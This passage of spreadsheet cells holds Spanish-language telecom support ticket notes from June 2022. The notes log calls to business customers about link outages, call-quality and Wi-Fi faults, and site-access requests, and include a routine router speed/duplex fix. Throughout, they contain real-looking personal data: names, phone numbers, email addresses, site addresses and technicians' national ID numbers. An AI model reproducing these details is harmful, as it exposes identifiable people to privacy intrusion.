    <t>ALVARO CHAMALE 58264656 VIA VIVO INDICA QUE EL PERSONAL DE FOSE ENCUENTRA BUSCANDO EL CORTE DE FIBRA AUN PERO POR LAS LLUVIAS SE LES DIFICULTAR LA BUSQUEDA INDICAN QUE ESTA FUERTE LA LLUVIA.</t>
  </si>
  <si>
    <t>SE LLAMA SUPERVISOR DE PLEX  58269878 JOSE ESCOBAR  VIA VIVO INDICA QUE EL PERSONAL YA ENCONTRO EL INCONVENIENTE YA SE ENCUENTRA TRABAJANDO EN LAS REPARACIONES INDICA QUE SE ESTA INSTALADO UN TRAMO NUEVO DE FIBRA OPTICA DE 100 METROS Y POSTERIOR A ESO SE REALIZARA LAS FUCIONES DE AMBOS EXTREMOS AVANCES EN 1 HORA Y 30 MINUTOS</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ALVARO CHAMALE 58264656 VIA VIVO INDICA QUE EL PERSONAL DE FO SE ENCUENTRA BUSCANDO EL CORTE DE FIBRA</t>
  </si>
  <si>
    <t>F4600111</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GENESIS REDONDO 96725293 | 94381106 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001434101 - 3001434309</t>
  </si>
  <si>
    <t>F4600117</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN ZELEDON  89312842 QUIEN REINCIA LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
-ID 2001945944
NOMBRE DEL CLIENTE: EMP NIC DE ACUEDUCTOS Y ALCANTARILLADOSENACAL
UBICACIÓN:DE LA ALCALDIA MEDIA CUADRA AL SUR SOBRE LA POLICIA NACIONAL 2 CUADRAS AL SUR, TELPANECA
CONTACTO EN SITIO: JUAN ZELEDON  89312842
HORARIO DE ATENCION:8:00 - 12:00 Y 13:00 - 16:30
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN ZELEDON 89312842 PARA BRINDAR RETROALIMENTACION
-ID 3001023460</t>
  </si>
  <si>
    <t>F4600121</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE VANESA FLORES QUIEN INDICA QUE ESTA REALIZANDO PRUEBAS.</t>
  </si>
  <si>
    <t>F4600129</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SAUL POTOSTE/58903216 MENCIONA QUE VA MANEJANDO Y NO PUEDE APOYAR EN ESTE MOMENTO
-ID 3001259225</t>
  </si>
  <si>
    <t>SE LLAM A ACLIENTE  SAUL POTOSTE 58903216 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE LE NOTIFICA QUE A NIVEL DE CLARO OBSERVAMOS OPERATIVO Y ESTABLE
CLIENTE NO APOYA EN REALIZAR PRUEBAS, NI VALIDAR SI AUN PERSISTE EL PROBLEMA Y SOLICITA VISITA TECNICA
-ID 3001043461
NOMBRE DEL CLIENTE: OCAL
UBICACIÓN: KILOMETRO 6.5 CARRETERA MASAYA CONTIGUO A EDIFICIO CLARO CONTIGUO A PLAZA SANTO DOMINGO
CONTACTO EN SITIO: SAUL POTOSTE 58903216
HORARIO DE ATENCION:9:00 - 18:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALICIA ALEGRIA/57949107 NO RESPONDE, ENVIA A BUZON
-ID 3001024431</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALICIA ALEGRIA/57949107 ENVIA DIRECTO  A BUZON
-ID 3001251564 - 3001251710</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SAUL POTOSTE 58903216 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001290280</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL POTOSTE/58903216 NO RESPONDE, ENVIA A BUZON
-ID 3001250829</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALICIA ALEGRIA AL 57949107 CONTESTA LA SEÑORITA ANA SOLICITA QUE SE LE LLAME AL SEÑOR SAUL AL NUMERO 58903216 **
-ID 2001959534
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL POTOSME AL 58903216 INFORMA QUE AUN PERSISTE EL INCONVENIENTE QUE NO SE PUEDE CONECTAR VIA WIFI || SE NOTIFICA A GESTOR **
-ID 2001961101
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL POTOSTE 58903216 MENCIONA QUE PERSISTE EL INCONVENIENTE CON EL WIFI PERO NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA LAS 9:00
-ID 3001025064</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL POTOSTE AL 58903216 INDICA QUE TECNICO AUN ESTA REALIZANDO VALIDACIONES **
-ID 3001175129
**</t>
  </si>
  <si>
    <t>F4600133</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRENDA GONZALEZ AL  78518905 / 77413044 INDICA QUE EL PROBLEMA CON LA CONEXION POR RATOS TIENE Y POR RATOS NO Y HACE QUE SE LE DESCONFIGURE SUS EQUIPOS COMO LA IMPRESORA || SE NOTIFICA A GESTOR **
-ID 2Q001963322
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRENDA GONZALEZ 78518905 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001031672</t>
  </si>
  <si>
    <t>F4600140</t>
  </si>
  <si>
    <t>**SE LLAMO A EDISON BARRIGA AL NUMERO (+593) 993327940 NUMERO DESCONECTADO || SE INTENTARA LUEGO **
ID 2001967515 - 2001967530
**</t>
  </si>
  <si>
    <t>F4600141</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON CLIENTE KEVIN RODRIGUEZ 23386565 EXT 94444 (ID 3001272603 / 3001273635) PARA VALIDAR TEMA DE ACCESOS, YA PERSONAL EN SITIO (MARLON MUÑOZ) NO CUENTA AÚN CON AUTORIZACIÓN DE INGRESO PARA ÉL Y LA COMPUTADORA. DE MOMENTO SE ENVÍA CORREO A LA ESPERA DE COMENTARIOS DE CLIENTE. ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 9:26
PARA: KEVIN STEVE RODRIGUEZ REYES &lt;KEVIN.RODRIGUEZ@BAM.COM.GT&gt;; HANS OLIVER GUILLERMO MERIDA &lt;HANS.GUILLERMO@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; BYRON ALFONSO VELIZ RODRIGUEZ &lt;BYRON.VELIZ@BAM.COM.GT&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: GL_INF_REDES &lt;INFORMATICA.REDES@BAM.COM.GT&gt;; LUIS FERNANDO CUEVAS CALLEJAS &lt;LUIS.CUEVAS@CLARO.COM.GT&gt;; DANIEL ANIBAL JUAREZ VEGA &lt;DANIEL.JUAREZ@CLARO.COM.GT&gt;; DESPACHO CORPORATIVO &lt;DESPACHOCORPORATIVO@CLARO.COM.GT&gt;
ASUNTO: RE: CONSULTA DATO / 7300292T BANCO AGROMERCANTIL DE GUATEMALA, S.A. CLZ.ROOSEVELTH 13-46 ZONA 07, EDIF.RENAO CENTER NIV.2
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, PERSONAL TÉCNICO SE ENCUENTRA EN LAS INSTALACIONES DE RENAP, SIN EMBARGO, NO SE LE HA PERMITIDO EL INGRESO TANTO A SU PERSONA COMO AL EQUIPO QUE LLEVA (COMPUTADORA). FAVOR DE SU APOYO EN PODER GESTIONAR EL ACCESO, O BIEN APOYARNOS EN LA RECOORDINACIÓN DE LA VISITA. SE HA TRATADO DE CONTACTAR A LA EXT 94444, PERO NO SE LOGRA LA COMUNICACIÓN.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>PERSONAL CNOC CLARO YA COORDINÓ LA VISITA TÉCNICA PARA MAÑANA A LAS 09:00AM, SE LLAMÓ A CLIENTE PARA APOYO A CONFIRMAR LOS PERMISOS, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4600143</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE SILVIA LEIVA QUIEN VA APOYAR A REINCIAR EL EQUIPO.
2001946061
COLA:
NOMBRE: A: 42173913
NÚMERO: 42173913
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 42173913
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/06/2022 15:41:59</t>
  </si>
  <si>
    <t>F4600144</t>
  </si>
  <si>
    <t>SE LLAMO JOSE ANGEL CARRILLO MONTERO AL NUMERO 52 55 5174 5299 RESPONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA | SE INTENTARA LUEGO **
-ID 2001968606
**</t>
  </si>
  <si>
    <t>F4600148</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 13 DE JUNIO DE 2022 18:38PARA: ALLADARESCE@LDSCHURCH.ORG &lt;ALLADARESCE@LDSCHURCH.ORG&gt;; MARROQUINJC@CHURCHOFJESUSCHRIST.ORG &lt;MARROQUINJC@CHURCHOFJESUSCHRIST.ORG&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_IJSUD_GT_LA_NORI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0148
ID: 349900226T
IDENTIFICADOR DEL CLIENTE:  CC_IJSUD_GT_LA_NORIA
UBICADO EN:  ALDEA SAN JUAN LA NORIA TIQUISATE ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4600150</t>
  </si>
  <si>
    <t>CLIENTE YARID HERNANDEZ 3001940125 HA REALIZADO PRUEBAS DE LLAMADAS Y VALIDA QUE YA NO HA PRESENTADO INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO
COLA:
NOMBRE: A: 0050370692921
NÚMERO: 0050370692921
DURACIÓN: 0:01:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050370692921
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 18/06/2022 11:46:23 A. M.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YARID HERNANDEZ 70692921 MENCIONA QUE PERSISTE EL INCONVENIENTE CON EL AUDIO EN LAS LLAMADAS
-ID 3001057193 - 3001057802
NOMBRE DEL CLIENTE: CASTELLA SAGARRA S.A. DE C.V
UBICACIÓN:ALAMEDA ENRIQUE MANUEL ARANJO, PASAJE CARBONEL COLONIA ROMA, SAN SALVADOR
CONTACTO EN SITIO: YARID HERNANDEZ 70692921
HORARIO DE ATENCION:8:00 - 17:30
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YARID HERNANDEZ 70692921 MENCIONA QUE PRESENTARON PROBLEMA CON 2 LLAMADAS DURANTE EL TRANSCURSO DE LA TARDE, SE CONCUERDA CON CLIENTE DEJARLO EN MONITOREO PARA MAÑANA A LAS 12:30
-ID 3001199231</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  YARID HERNANDEZ AL 70692921 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001969755
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YARID HERNANDEZ 70692921 MENCIONA QUE PERSISTE EL INCONVENIENTE CON LAS LLAMADAS, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001348889</t>
  </si>
  <si>
    <t>CLIENTE YARID HERNANDEZ 70692921 SOLICITA SE LE LLAME A LAS 11:40 AM EN LO QUE REALIZA PRUEBAS Y VALIDAR, YA QUE EL DÍA DE AYER NO LABORARON. ID: 3001893992</t>
  </si>
  <si>
    <t>F4600154</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELYN ÁLVAREZ AL 54829794 CONFIRMA SERVICIO ESTABLE  AUTORIZA CIERRE DE TICKET **
-ID 3001034673
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELYN ÁLVAREZ AL 54829794 CLIENTE NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001017109
**</t>
  </si>
  <si>
    <t>F4600160</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDRES BARAHONA 31859002 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001955231 - 2001955708</t>
  </si>
  <si>
    <t>F4600161</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME LOPEZ 74899894 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001959941</t>
  </si>
  <si>
    <t>F4600175</t>
  </si>
  <si>
    <t>CLIENTE SE RETIRÓ DE LABORES; PIDE SE CONTINÚE SEGUIMIENTO MAÑANA A LAS 07:00AM PARA DETERMINAR ESTADO DE LOS EQUIPOS Y/O REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE PEREZ, QUIEN INDICA QUE YA NO ESTA EN LAS INSTALACIONES.
SOLICITA QUE SE LE LLAME EL DIA DE MAÑANA A LAS 7:00AM.
2001972699
COLA:
NOMBRE: A: 47391182
NÚMERO: 47391182
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 47391182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/06/2022 17:12:22</t>
  </si>
  <si>
    <t>F4600177</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALEX ZAVALETA 78687182 CLIENTE VALIDA ENLACE OPERATIVO Y ESTABLE, SE PROCEDE AL CIERRE DEL INDICENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX ZAVALETA 78687182 MENCIONA QUE PERSISTE EL INCONVENIENTE
-ID 3001051654
NOMBRE DEL CLIENTE: AMERIJET EL SALVADOR S.A. DE C.V.
UBICACIÓN:77 AVENIDA NORTE #217 COLONIA ESCALON, SAN SALVADOR
CONTACTO EN SITIO: ALEX ZAVALETA 78687182
HORARIO DE ATENCION:8:00 - 17:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE ALEX ZAVALETA 78687182 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001961525</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO ALCANZA EL BW CORRECTO INDICA QUE NO CUENTA CON LAPTOP O PC PARA REALIZAR PRUEBAS DIRECTA INDICA QE DE BAJADA NO ALCANZA NI 1MB --- NDICA QUE SI SE NECESITA PRUEBAS SEA MAÑANA A APARTIR DE LAS 9 AM-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALEX ZAVALETA 78687182 SE LE INFORMA QUE SE REALIZO CAMBIO DE NEGOCIACION EN LA INTERFACE QUE CONECTA HACIA SU LAN YA CON ESTO TIENE QUE LLEGAR A SU ANCHO DE BANDA, CONFIRMA QUE AHORA SI LLEGA Y SOLICITA REGRESAR LA LLAMADA EN UNA HORA REALIZARA MAS PRUEBAS ...
ANTES INTERFACE CON INGRESO DE CRC:
IDG000259#SH INT GI0/0
GIGABITETHERNET0/0 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS CN GIGABIT ETHERNET, ADDRESS IS F872.EA76.4A80 (BIA F872.EA76.4A80)
  DESCRIPTION: LAN DEL CLIENTE
  INTERNET ADDRESS IS 168.243.46.166/29
  MTU 1500 BYTES, BW 100000 KBIT/SEC, DLY 100 USEC,
     RELIABILITY 245/255, TXLOAD 10/255, RXLOAD 5/255
  ENCAPSULATION ARPA, LOOPBACK NOT SET
  KEEPALIVE SET (10 SEC)
  FULL DUPLEX, 100MBPS, MEDIA TYPE IS RJ45
  OUTPUT FLOW-CONTROL IS UNSUPPORTED, INPUT FLOW-CONTROL IS UNSUPPORTED
  ARP TYPE: ARPA, ARP TIMEOUT 00:05:00
  LAST INPUT 00:00:40, OUTPUT 00:00:00, OUTPUT HANG NEVER
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
  INPUT QUEUE: 0/75/0/0 (SIZE/MAX/DROPS/FLUSHES); TOTAL OUTPUT DROPS: 0
  QUEUEING STRATEGY: FIFO
  OUTPUT QUEUE: 0/40 (SIZE/MAX)
  30 SECOND INPUT RATE 1979000 BITS/SEC, 694 PACKETS/SEC
  30 SECOND OUTPUT RATE 3953000 BITS/SEC, 4168 PACKETS/SEC
     33977133 PACKETS INPUT, 2296533102 BYTES, 0 NO BUFFER
     RECEIVED 6 BROADCASTS (0 IP MULTICASTS)
     0 RUNTS, 0 GIANTS, 0 THROTTLES
     9435844 INPUT ERRORS, 3653797 CRC, 721124 FRAME, 1810 OVERRUN, 0 IGNORED
     0 WATCHDOG, 0 MULTICAST, 0 PAUSE INPUT
     229022772 PACKETS OUTPUT, 1420948162 BYTES, 0 UNDERRUNS
     0 OUTPUT ERRORS, 0 COLLISIONS, 2 INTERFACE RESETS
     0 UNKNOWN PROTOCOL DROPS
     0 BABBLES, 0 LATE COLLISION, 0 DEFERRED
     1 LOST CARRIER, 0 NO CARRIER, 0 PAUSE OUTPUT
     0 OUTPUT BUFFER FAILURES, 0 OUTPUT BUFFERS SWAPPED OUT
IDG000259#CONF T
ENTER CONFIGURATION COMMANDS, ONE PER LINE.  END WITH CNTL/Z.
IDG000259(CONFIG)#INT GI0/0
IDG000259(CONFIG-IF)#SPEED AUTO
IDG000259(CONFIG-IF)#DUPLEX FULL
IDG000259(CONFIG-IF)#
IDG000259(CONFIG-IF)#
IDG000259(CONFIG-IF)#EXIT
IDG000259(CONFIG)#
IDG000259(CONFIG)#EXIT
IDG000259#
IDG000259#WR
BUILDING CONFIGURATION...
[OK]
IDG000259#CLEAR COUNTERS
CLEAR "SHOW INTERFACE" COUNTERS ON ALL INTERFACES [CONFIRM]
IDG000259#
DESPUES SIN INGRESO DE CRC:
IDG000259#SH INT GI0/0
GIGABITETHERNET0/0 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS CN GIGABIT ETHERNET, ADDRESS IS F872.EA76.4A80 (BIA F872.EA76.4A80)
  DESCRIPTION: LAN DEL CLIENTE
  INTERNET ADDRESS IS 168.243.46.166/29
  MTU 1500 BYTES, BW 1000000 KBIT/SEC, DLY 10 USEC,
     RELIABILITY 255/255, TXLOAD 3/255, RXLOAD 1/255
  ENCAPSULATION ARPA, LOOPBACK NOT SET
  KEEPALIVE SET (10 SEC)
  FULL DUPLEX, 1GBPS, MEDIA TYPE IS RJ45
  OUTPUT FLOW-CONTROL IS UNSUPPORTED, INPUT FLOW-CONTROL IS UNSUPPORTED
  ARP TYPE: ARPA, ARP TIMEOUT 00:05:00
  LAST INPUT 00:00:34, OUTPUT 00:00:00, OUTPUT HANG NEVER
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS 00:00:13
  INPUT QUEUE: 0/75/0/0 (SIZE/MAX/DROPS/FLUSHES); TOTAL OUTPUT DROPS: 0
  QUEUEING STRATEGY: FIFO
  OUTPUT QUEUE: 0/40 (SIZE/MAX)
  30 SECOND INPUT RATE 2658000 BITS/SEC, 948 PACKETS/SEC
  30 SECOND OUTPUT RATE 12568000 BITS/SEC, 5609 PACKETS/SEC
     14786 PACKETS INPUT, 4852436 BYTES, 0 NO BUFFER
     RECEIVED 0 BROADCASTS (0 IP MULTICASTS)
     0 RUNTS, 0 GIANTS, 0 THROTTLES
     0 INPUT ERRORS, 0 CRC, 0 FRAME, 0 OVERRUN, 0 IGNORED
     0 WATCHDOG, 0 MULTICAST, 0 PAUSE INPUT
     82042 PACKETS OUTPUT, 28854948 BYTES, 0 UNDERRUNS
     0 OUTPUT ERRORS, 0 COLLISIONS, 0 INTERFACE RESETS
     0 UNKNOWN PROTOCOL DROPS
     0 BABBLES, 0 LATE COLLISION, 0 DEFERRED
     0 LOST CARRIER, 0 NO CARRIER, 0 PAUSE OUTPUT
     0 OUTPUT BUFFER FAILURES, 0 OUTPUT BUFFERS SWAPPED OUT</t>
  </si>
  <si>
    <t>F4600178</t>
  </si>
  <si>
    <t>SR GUILLERMO CANALES / 86069398 VALIDA ENLACE OPERATIVO, INFORMA QUE EL ENLACE LLEVA 11 AÑOS EN PRODUCCION Y SOLICITA NO CAMBIAR LA CONFIGURACION NI TOCAR NADA MAS YA QUE ESTE ENLACE ES IMPORTANTE PARA FACTURACION, SE INFORMA A LIDER CNOC KEVYN FONSECA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO CANALES 86069398 MENCIONA QUE NO LE LLEGA A LOS EQUIPOS DE PR, CLIENTE COMPARTE PRUEBAS POR CORREO
ASUNTO: RV: MANTENIMIENTO - UPS ENACAL
-ID 2001965445</t>
  </si>
  <si>
    <t>F4600180</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 13:11
PARA: EDDILSON EDDUARD AREVALO MORALES &lt;EDDILSON.AREVALO@CLARO.COM.GT&gt;; DIEGO MORA (VENDOR) &lt;LUIS.D.MORA@WALMART.COM&gt;; CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOC EMPRESAS &lt;SOCEMPRESAS@CLARO.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO TICKET SD1134718 TIENDA 82
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22437253 PARA SEGUIMIENTO, NO CONTESTA; SE PIDE A CNOC/SOC CLARO QUE NOS INCLUYAN EN LA COLA DE CORREOS, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>F4600182</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A SRTA. ANA LUCIA TEJEDA ....</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ANA LUCÍA TEJEDA/PR 56005135 ACTUALMENTE EN LLAMADA, PROCEDE A ENLAZAR A SR. CHRISTIAN Y SE CORTA LA LLAMADA... ...</t>
  </si>
  <si>
    <t>F4600197</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAMIAM RIVAS AL 70703269  INFORMA QUE NO SE ENCUENTRA EN SITIO QUE TUVIERON UNA EMERGENCIA Y NO HAY NADIE QUE TODOS ANDAN FUERA Y QUE REGRESA A LAS 13:30 SOLICITA QUE SE LE LLAME A ESA HORA **
-ID 3001037528
**</t>
  </si>
  <si>
    <t>F4600199</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL AREVALO 61833048 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001973436</t>
  </si>
  <si>
    <t>F4600205</t>
  </si>
  <si>
    <t>SE HABLÓ CON PAULA DÍAZ/CLIENTE 46967758 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4600210</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS DURAN 506 41092995 INDICA QUE NO ESCUCHA BIEN Y CORTA LA LLAMADA, SE INTENTARA LUEGO
-ID 2001975762</t>
  </si>
  <si>
    <t>F4600212</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE SR. JAIME ALVARADO 22974131 SOLICITA LLAMADA AL 70737502 ...</t>
  </si>
  <si>
    <t>SE LLAMA A  SR. JAIME ALVARADO 70737502 CONFIRMA EQUIPOS ENCENDIDOS, APLICO REINICIO PERO ENLACE AUN NO LEVANTA. SE PROCEDE A SOLICITAR APOYO DE PERSONAL TECNICO....</t>
  </si>
  <si>
    <t>F4600225</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE EN ESPERA DE ACCESOS
GESTION DE ACCESOS F4600225| 8901491T | BANRURAL | REDUNDANCIA.- AG. 47. CALLE REAL PRIMER CANTON SAN JUAN ALOTENANGO ESQUINA DE LA PILA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;;TIC-TELECOM@BANRURAL.COM.GTY 3 MÁS
CC:GRUPO N1;CNOCCA
MAR 14/06/2022 14:27
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4600225| 8901491T | BANRURAL | REDUNDANCIA.- AG. 47.  CALLE REAL PRIMER CANTON SAN JUAN ALOTENANGO ESQUINA DE LA PILA
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
TECNICO 	IBM	DPI
BYRON GIOVANNI TEJAXÚN PAJARITO
736327	1778904870304
FLAVIO ROMEO ESQUIT AJQUEJAY
568014	2489694550409
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4600254</t>
  </si>
  <si>
    <t>SE HABLA CON OSBELIA REYES 55719808 CLIENTE INDICA QUE YA REINICIÓ EQUIPOS PERO EL SERVICIO NO RESTABLECE, SOLICITA VISITA TÉCNICA. ID: 3001111540</t>
  </si>
  <si>
    <t>F4600264</t>
  </si>
  <si>
    <t>-* SE HABLA CON FREDY ESCOBAR (CLIENTE) SE LE INFORMA QUE AUN ESTAMOS A LA ESPERA YA QUE LOS SERVIDORES DE BLACKLIST SON AJENOS A CLARO, INFORMA QUE ESCALARÁ POR QUE TIENE VARADA LA OPERACIÓN POR QUE ES UN SOFTWARE INDISPENSABLE -*
-*</t>
  </si>
  <si>
    <t>F4600267</t>
  </si>
  <si>
    <t>/*/*/CLIENTE INDICA QUE DESEA QUE SE VERIFIQUE EL RESPALDO DE LA TORRE QUE LE BRINDA EL SERVICIO YA QUE SIEMPRE QUE EN EL MUNICIPIO NO HAY LUZ EL SERVICIO DE LA AGENCIA CAE, PERO ELLOS CUENTAN CON RESPALDO, ES CLARO QUIEN NO TIENE UN RESPALDO DE ENERGÍA QUE MANTENGA EL SERVICIO ACTIVO*/*/*/</t>
  </si>
  <si>
    <t>F4600286</t>
  </si>
  <si>
    <t>SE LLAMA A SUPERVISOR GUSTAVO ADOLFO MARROQUIN MENENDEZ 58262789, SE LE COMENTA DE CASO PERO QUE TECNICOS ESTAN A 1 HORA DE DISTANCIA, SE LLAMA A ENCARGADO DE TIENDA 42174164 PERO NO CONTESTA, SE INTENTA CON QUIEN REPORTO FALLA WALMAR NAVARRO 47703256 QUIEN SOLICITA VIAITA PARA MAÑANA MARTES 7 AM
SUPERVISOR ASIGNA A TECNICOS
MILTON DAVID MORATAYA GONZALEZ	650123	2277-08458-0501	54455087
AXEL DANILO ZARPEC SAZO	796395	1624-52527-0501	58263317
2001992037
COLA:
NOMBRE: A: 42174164
NÚMERO: 42174164
DURACIÓN: 0:00:36
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42174164
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/06/2022 18:57:22
2001992205
COLA:
NOMBRE: A: 47703256
NÚMERO: 47703256
DURACIÓN: 0:01:39
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47703256
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/06/2022 19:00:01
2001991774
COLA:
NOMBRE: A: 58262789
NÚMERO: 58262789
DURACIÓN: 0:11:01
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58262789
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/06/2022 19:05:12</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO VISITA PARA EL DIA DE MAÑANA A LAS 7:00 HRS || PENDIENTE CONFIRMACIÓN
ASUNTO: VISITA TÉCNICA ID: 361700115T || GRUPO DE TIENDAS ASOCIADOS || MUNICIPIO PUERTO DE SAN JOSE
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
